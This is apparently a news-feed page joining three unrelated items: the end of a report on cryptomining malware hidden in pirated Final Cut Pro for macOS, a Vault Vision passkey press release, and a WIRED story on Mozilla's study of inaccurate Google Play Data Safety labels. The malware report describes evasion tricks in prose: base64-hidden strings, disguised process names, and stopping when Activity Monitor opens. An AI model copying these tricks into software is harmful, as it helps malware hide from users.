"This made it harder for users to detect the malware's activity, but it would keep mining until the user logged out or restarted the computer. Additionally, the authors started using a technique called base 64 encoding to hide suspicious strings of code associated with the malware, making it harder for antivirus programs to detect," Bradley says.

He tells Dark Reading that with the latest version, the malware changes the process name to look identical to system processes. "This makes it difficult for the user to distinguish the malware processes from native ones when viewing a process listing using a command-line tool.

One feature that has remained consistent through the different versions of the malware is its constant monitoring of the "Activity Monitor" application. Users can often open the app to troubleshoot problems with their computers and in doing so could end up detecting the malware. So, "once the malware detects that the user has opened the Activity Monitor, it immediately stops all its processes to avoid detection."

Instance of threat actors bundling malware into pirated macOS apps have been rare and far between. In fact, one of the last well-known instances of such an operation was in July 2020, when researchers at Malwarebytes discovered a pirated version of application firewall Little Snitch that contained a downloader for a macOS ransomware variant.

Pirated Final Cut Pro for macOS Offers Stealth Malware Delivery

Eliminate passwords in user authentication workflow with Vault Vision's passkey features like facial recognition, fingerprint and pin verification on all modern devices.

**DENVER, Feb. 22, 2023 /PRNewswire-PRWeb/ --** Vault Vision, a leading user  
authentication platform for developers announced the launch of passkey  
authentication technology enabling secure and convenient logins on modern  
devices. Legacy passwords are central to website and app security, but 81% of  
hacking-related breaches leveraged either stolen and/or weak passwords. A Google  
study found that 75% of Americans are frustrated with passwords and 43% have  
shared their password with someone. Passkey auth aims to solve an inherent  
weakness in passwords with support from Apple, Google and Microsoft on all  
modern browsers and devices.  
For application users, passkey is an easier replacement for passwords. With  
passkey, users can sign in to applications with biometric authentication such as  
a fingerprint or facial verification, PIN, or pattern, unlocking them from  
having to remember and manage passwords. A user can sign into applications on  
all modern devices using a passkey, which can be created on a mobile phone and  
used to sign in to a website on a separate laptop. Passkey authentication makes  
it phishing-resistant and brute force attacks, and one the most secure  
authentication methods available today. Vault Vision's one click passwordless  
login drastically improves the user registration and login workflow with the  
addition of passkey.

For developers, Vault Vision's user authentication platform enables easy  
integration of passwordless logins into any website or application built on  
React, Node, Python, Go and low code platforms like Webflow. Developers can  
leverage Vault Vision's open sourced examples available as GitHub repos in  
React, Node, Python and Go, which can be deployed with auto-generated and  
pre-set copy-and-paste environment configuration stanzas. These repos offer an  
implementation insight into the integration flows with auth use cases. "Vault  
Vision is the only passwordless-first auth platform that does not require a  
password during setup." said Neil Proctor, CEO and Founder, Vault Vision. "Our  
technology enables developers to register without passwords and start creating  
local development environments with our user auth in less than a minute. For end  
users, the convenience of passwordless login drives user registration and login  
growth with facial recognition, fingerprint & pin based verification on all  
modern devices".  
The addition of passkey auth and passwordless logins makes Vault Vision's one of  
the most secure authentication platform with its privacy-first architecture.  
Vault Vision is the only authentication platform that protects end user privacy  
from password breaches by eliminating use of third-party scripts and low quality  
sdk's. With the average authentication tool employing an average of eight  
tracking elements, Vault Vision maintains zero third-party dependence  
eliminating vendor breach risk for developers and the ability to operate in  
air-gapped and secure operating environments.  
Vault Vision offers free developer sandboxes and expert help with your free  
trial, learn more here.**About Vault Vision**  
Vault Vision is a no code user authentication platform that enables developers  
to easily deploy user auth & passwordless logins on React, Python, Go, Node  
applications and low code platforms like Webflow. Vault Vision's authentication  
technology increases login engagement and drives user registration growth with  
OpenID Connect (OIDC), FIDO2 and passkey logins. End users benefit from Vault  
Vision's convenient authentication features like passkey facial recognition,  
fingerprint, pin based verification, OIDC logins for Apple, Google and  
Microsoft, two-factor auth (2FA), multi-factor auth (MFA), universal time-based  
one-time password (TOTP) auth, SSO with email and hardware key auth. Vault  
Vision's is a FIDO Alliance member and its user authentication technology is  
OpenID Certified.

Vault Vision Launches One Click Passwordless Logins With Passkey User Authentication

Mozilla researchers found that apps often provide inaccurate data use disclosures, giving people “a false sense of security.”

It's basically impossible to keep track of what all your mobile apps are doing and what data they share with whom and when. So over the past couple of years, Apple and Google have both added mechanisms to their app stores meant to act as a sort of privacy nutrition label, giving users some insight into how apps behave and what information they may share. These transparency tools, though, are populated with self-reported information from app developers themselves. And a new study focused on the Data Safety information in Google Play indicates that the details developers are providing are often inaccurate.

Researchers from the nonprofit software group Mozilla looked at the Data Safety information of Google Play's top 40 most-downloaded apps and rated these privacy disclosures as “poor,” “needs improvement,” or “OK.” The assessments were based on the degree to which the Data Safety information did or did not align with the information in each app's privacy policy. Sixteen of the 40 apps, including Facebook and Minecraft, received the lowest grade for their Data Safety disclosures. Fifteen apps received the middle grade. These included the Meta-owned apps Instagram and WhatsApp, but also the Google-owned YouTube, Google Maps, and Gmail. Six of the apps were awarded the highest grade, including Google Play Games and _Candy Crush Saga_.

“When you land on Twitter’s app page or TikTok’s app page and click on Data Safety, the first thing you see is these companies declaring that they don’t share data with third parties. That’s ridiculous—you immediately know something is off,” says Jen Caltrider, Mozilla’s project lead. “As a privacy researcher, I could tell this information was not going to help people make informed decisions. What’s more, a regular person reading it would most certainly walk away with a false sense of security.”

Google mandates that all app developers submitting to Google Play complete the Data Safety form. The rationale is that the developers are the ones who have the information on how their product handles data and interacts with other parties, not the app store that facilitates distribution. 

“If we find that a developer has provided inaccurate information in their Data Safety form and is in violation of the policy, we will require the developer to correct the issue to comply. Apps that aren’t compliant are subject to enforcement actions,” Google told the Mozilla researchers. The company did not address questions from WIRED about the nature of these enforcement actions or how often they have been taken.

Google refutes the researchers' methodology, though. “This report conflates company-wide privacy policies that are meant to cover a variety of products and services with individual Data Safety labels, which inform users about the data that a specific app collects,” the company says in a statement. “The arbitrary grades Mozilla Foundation assigned to apps are not a helpful measure of the safety or accuracy of labels given the flawed methodology and lack of substantiating information.”

In other words, Google is saying that the Mozilla researchers misunderstood the scope of the privacy policies they were looking at or even consulted the wrong policies entirely. But the researchers say the privacy policies they used in their analysis are the exact policies each app developer links to on Google Play, indicating that they apply to the apps in question.

“Google's own response to our research highlights the exact problem we highlighted,” Mozilla's Caltrider says. “What information are consumers to trust and rely on if the self-reported information from app developers in the Data Safety section is different from the privacy policies linked on the same app page? Ultimately, our goal is to help Google give consumers what they need to make informed decisions about their privacy. This starts with Google improving their Data Safety information.”

The report also lays out how Google's current Data Safety form creates blind spots and opportunities for developers to leave out information about how their apps behave and share user data. For example,  the form has broad exemptions for app developers to report data sharing with “service providers” and for “specific legal purposes.” And the researchers found that the definitions Google uses for the words “collection” and “sharing” are narrow, meaning that developers may not be required to report activity that users would think of as data collection and sharing. Additionally, the researchers note that Google doesn't require app developers to disclose data collection when the information is being anonymized. This is noteworthy because of debates over whether it is possible to truly anonymize data as well as a long track record of app developers making mistakes or using flawed schemes in their attempts to anonymize data.

Both Google and Mozilla's researchers note that Google Play's Data Safety mechanism is still new. And the researchers say it can be refined to be a valuable indicator for users. Without urgent reform, though, they argue that the Data Safety information is currently doing more harm than good by giving users an inaccurate privacy picture of what's going on inside their apps.

Tag

#apple